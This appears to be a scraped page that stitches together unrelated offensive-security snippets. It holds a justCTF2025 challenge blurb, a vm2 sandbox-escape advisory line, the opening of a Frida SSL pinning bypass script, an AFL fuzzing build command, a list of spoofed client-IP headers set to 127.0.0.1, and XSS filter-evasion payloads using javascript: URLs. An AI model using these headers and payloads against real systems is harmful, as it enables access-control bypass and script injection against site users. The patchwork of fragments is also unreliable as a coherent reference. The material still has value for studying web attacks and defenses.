From justCTF2025
A super secure application generated by the overlords for our positive players. Don't overthink it—it's not too hard—but try to think outside the box!
Vibe coding is the future. Good luck and have fun!
Promise[@@species]In vm2 for versions up to 3.9.19, Promise handler sanitization can be bypassed with @@species accessor property allowing attackers to escape the sandbox and run arbitrary code.
| console.log("[*] SSL Pinning Bypasses"); | |
| console.log(`[*] Your frida version: ${Frida.version}`); | |
| console.log(`[*] Your script runtime: ${Script.runtime}`); | |
| /** | |
| * by incogbyte | |
| * Common functions | |
| * thx apkunpacker, NVISOsecurity, TheDauntless | |
| * Remember that sslpinning can be custom, and sometimes u need to reversing using ghidra,IDA or something like that. | |
| * !!! THIS SCRIPT IS NOT A SILVER BULLET !! |
| #!/bin/bash | |
| cmake -DCMAKE_C_COMPILER=afl-clang-fast -DCMAKE_CXX_COMPILER=afl-clang-fast++ -DCMAKE_CXX_FLAGS="-fno-rtti -fsanitize=address,undefined -fno-sanitize-recover=all -g" -DCMAKE_C_FLAGS="-fno-rtti -fsanitize=address,undefined -fno-sanitize-recover=all -g" -DCMAKE_EXE_LINKER_FLAGS="-fno-rtti -fsanitize=address,undefined -fno-sanitize-recover=all" DCMAKE_INSTALL_PREFIX=/home/fuzz/fuzzing/xpdf-4.03/install/ -DCMAKE_MODULE_LINKER_FLAGS="-fno-rtti -fsanitize=address,undefined -fno-sanitize-recover=all" -DCMAKE_BUILD_TYPE=Debug,ASAN,UBSAN -DWITH_SSE2=ON -DMONOLITHIC_BUILD=ON -DBUILD_SHARED_LIBS=OFF . |
| CACHE_INFO: 127.0.0.1 | |
| CF_CONNECTING_IP: 127.0.0.1 | |
| CF-Connecting-IP: 127.0.0.1 | |
| CLIENT_IP: 127.0.0.1 | |
| Client-IP: 127.0.0.1 | |
| COMING_FROM: 127.0.0.1 | |
| CONNECT_VIA_IP: 127.0.0.1 | |
| FORWARD_FOR: 127.0.0.1 | |
| FORWARD-FOR: 127.0.0.1 | |
| FORWARDED_FOR_IP: 127.0.0.1 |
| <a[1]href[2]=[3]"[4]java[5]script:[6]alert(1)"> | |
| [1] | |
| Bytes: | |
| \x09 \x0a \x0c \x0d \x20 \x2f | |
| <a/href="javascript:alert(1)"> | |
| <a\x09href="javascript:alert(1)"> | |
| [2,3] |
